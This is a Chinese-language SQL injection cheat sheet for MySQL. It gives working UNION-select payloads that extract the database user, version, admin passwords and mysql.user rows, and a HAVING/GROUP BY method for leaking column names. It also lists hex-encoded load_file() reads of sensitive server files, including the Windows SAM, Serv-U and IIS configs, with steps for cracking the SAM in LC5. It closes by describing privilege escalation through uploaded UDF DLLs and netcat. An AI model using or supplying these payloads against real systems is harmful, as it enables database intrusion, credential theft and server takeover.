MYSQL 注入資料總結

and 1 = 2 union all select 1,2,3,user()
and 1 = 2 union all select 1,2,3,version()
and 1 = 2 union all select 1,2,3,database()
and 1 = 2 union all select 1,2,3,load_file(0x檔案路徑)
and 1 = 2 union all select 1,2,3,password from admin
and 1 = 2 union all select 1,2,3,user from mysql.user

以上的password是欄位名  admin是表名，但是在進行union的時候 我們並不知道資料表的名字和欄位名稱，所以我們就來看看如果暴欄位名稱。

暴欄位名稱在5.0以上版本都是依靠infomation庫來讀取的，但是5.0以下版本沒有information庫，所以一般都是用having，having與group by的關係類似於where與select的關係，where是針對select的條件，having是group by的篩選條件。

select * from tb_test having 1=1   會返回一個錯誤，錯誤裡包含第一個欄位的名稱，得到第一個欄位的名稱比如是id之後
select * from tb_test group by id having 1=1  會返回錯誤  錯誤中包含第二個欄位的名稱，然後依次試出所有欄位名稱。

mysql有一個load_file函數很好用，不過需要當前串連為root許可權
使用方法：load_file(0x路徑字串的16進位)，下面是常用的一些敏感檔案
load_file(0x633A2F77696E646F77732F6D792E696E69)   c:/windows/my.ini   WinMyAdmin1.1版本使用了明文在這裡儲存了使用者名稱和密碼
load_file(0x633A2F77696E646F77732F7068702E696E69)   c:/windows/php.ini   查看php版本資訊
load_file(0x633A2F626F6F742E696E69)   c:/boot.ini   查看作業系統資訊

還有如下一些敏感資訊：
c:/winnt/php.ini     
c:/winnt/my.ini
c:\mysql\data\mysql\user.MYD  //儲存了mysql.user表中的資料庫連接密碼
c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini  //儲存了虛擬機器主機網站路徑和密碼
c:\Program Files\Serv-U\ServUDaemon.ini
c:\windows\system32\inetsrv\MetaBase.xml  //IIS設定檔
c:\windows\repair\sam  //儲存了WINDOWS系統初次安裝的密碼
c:\Program Files\ Serv-U\ServUAdmin.exe  //6.0版本以前的serv-u管理員密碼儲存於此
c:\Program Files\RhinoSoft.com\ServUDaemon.exe
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif檔案
//儲存了pcAnywhere的登陸密碼
c:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf //查看     WINDOWS系統apache檔案
c:/Resin-3.0.14/conf/resin.conf   //查看jsp開發的網站 resin檔案配置資訊.
c:/Resin/conf/resin.conf      /usr/local/resin/conf/resin.conf 查看linux系統配置的JSP虛擬機器主機
d:\APACHE\Apache2\conf\httpd.conf
C:\Program Files\mysql\my.ini
c:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虛擬機器主機配置
C:\mysql\data\mysql\user.MYD 存在MYSQL系統中的使用者密碼

注意讀取SAM等二進位檔案的時候使用hex函數進行轉換，如：
select 1,2,3,hex(load_file(0x633A5C77696E646F77735C7265706169725C73616D))
然後將hex後的內容copy下來，開啟hex_workshop，使用特殊粘貼的方式，然後另存新檔hex檔案，就得到了伺服器的SAM檔案，然後開啟LC5(推薦容笑漢化版)跑密碼。

另外還可以爆出web路徑後  讀index.php內容，然後找到config.php，通過config.php讀出mysql資料庫的帳號密碼，然後就可以上傳:Mix.dll My_udf.dll兩個dll配合NC進行提權了。